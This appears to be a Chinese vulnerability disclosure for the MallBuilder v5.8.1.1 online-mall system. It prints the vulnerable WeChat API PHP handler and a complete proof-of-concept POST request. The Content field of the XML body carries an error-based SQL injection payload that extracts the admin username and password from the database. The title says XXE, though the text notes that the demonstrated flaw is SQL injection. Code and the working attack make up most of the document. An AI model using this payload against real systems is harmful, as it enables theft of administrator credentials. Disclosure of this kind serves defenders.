2014-10-29: 细节已通知厂商并且等待厂商处理中 2014-11-03: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-12-28: 细节向核心白帽子及相关领域专家公开 2015-01-07: 细节向普通白帽子公开 2015-01-17: 细节向实习白帽子公开 2014-12-30: 细节向公众公开
mallbuilder多用户商城系统XXE注入（注：下文实际演示的是经由XML解析的 Content 字段拼入 SQL 语句造成的 SQL 注入；原始 POST 数据直接交给 simplexml_load_string 解析，在未禁用外部实体的旧版 libxml 环境下同时存在 XXE 风险）
系统 MallBuilder_v5.8.1.1 的 api/wechat.php 中：
<?phpinclude_once("../includes/global.php");@include_once("../config/wechat_config.php");$wechat=$wechat_config['wechat']?$wechat_config['wechat']:"";define("TOKEN", $wechat);$wechatObj = new wechatCallbackapiTest();if($_GET["echostr"]&&$_GET["signature"]&&$_GET["timestamp"]&&$_GET["nonce"])//if后的get值不存在进入else语句{ $wechatObj->valid(); }else{ $wechatObj->responseMsg(); //跟踪responseMsg()函数}class wechatCallbackapiTest{ public function valid() { $echoStr = $_GET["echostr"]; if($this->checkSignature()){ echo $echoStr; exit; } } public function responseMsg() { $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; global $db,$config; if (!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; $keyword = trim($postObj->Content); $time = time(); $RX_TYPE = trim($postObj->MsgType); $num=0; $str=""; if($RX_TYPE=='text')//是POST的MsgType为text { if(!empty($keyword)) //在xml数据中定义Content变量 { $sql="select pname,id,pic from ".PRO." 
where pname like '%$keyword%' order by id desc limit 0,4"; //Content 进入sql语句,可以注入 $db->query($sql); $re=$db->getRows(); foreach($re as $val) { $str.="<item> <Title><![CDATA[".$val['pname']."]]></Title> <Description><![CDATA[]]></Description> <PicUrl><![CDATA[".$val['pic']."]]></PicUrl> <Url><![CDATA[".$config['weburl']."?m=product&s=detail&id=".$val['id']."]]></Url> </item>"; $num++; echo "test2"; } if($num>0) { $textTpl = "<xml> <ToUserName><![CDATA[%s]]></ToUserName> <FromUserName><![CDATA[%s]]></FromUserName> <CreateTime>%s</CreateTime> <MsgType><![CDATA[news]]></MsgType> <ArticleCount>".$num."</ArticleCount> <Articles>".$str."</Articles> <FuncFlag>1</FuncFlag> </xml>"; $msgType = "text"; $contentStr = ""; $resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr); echo $resultStr; } } else echo "Input something1 "; } else{ echo "Input something2 "; } }else{ echo ""; echo "test6"; exit; } } private function checkSignature() { $signature = $_GET["signature"]; $timestamp = $_GET["timestamp"]; $nonce = $_GET["nonce"]; $token = TOKEN; $tmpArr = array($token, $timestamp, $nonce); sort($tmpArr); $tmpStr = implode( $tmpArr ); $tmpStr = sha1( $tmpStr ); if( $tmpStr == $signature ){ return true; }else{ return false; } }}?>
PoC：POST 提交的请求（Content 字段携带基于 UpdateXML 报错的注入载荷，单引号闭合 like '%…%' 后用 # 注释掉其余语句）
POST /mallbuilder/api/wechat.php HTTP/1.1
Host: 127.0.0.1:8088
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=fdb687e31fb1d9a23b1b5dc3221123f9

<xml> <ToUserName>test1</ToUserName> <FromUserName>test3</FromUserName> <CreateTime>123456</CreateTime><MsgType>text</MsgType> <ArticleCount>11</ArticleCount><Articles>aaa</Articles><FuncFlag>0</FuncFlag><Content>test' and UpdateXML(1,CONCAT(0x5b,mid((SELECT (select concat(user,0x23,password) from mallbuilder_admin limit 1)),1,32),0x5d),1)#</Content></xml>
官网demo演示
无
危害等级：无影响（厂商忽略）
忽略时间:2014-12-30 14:44
暂无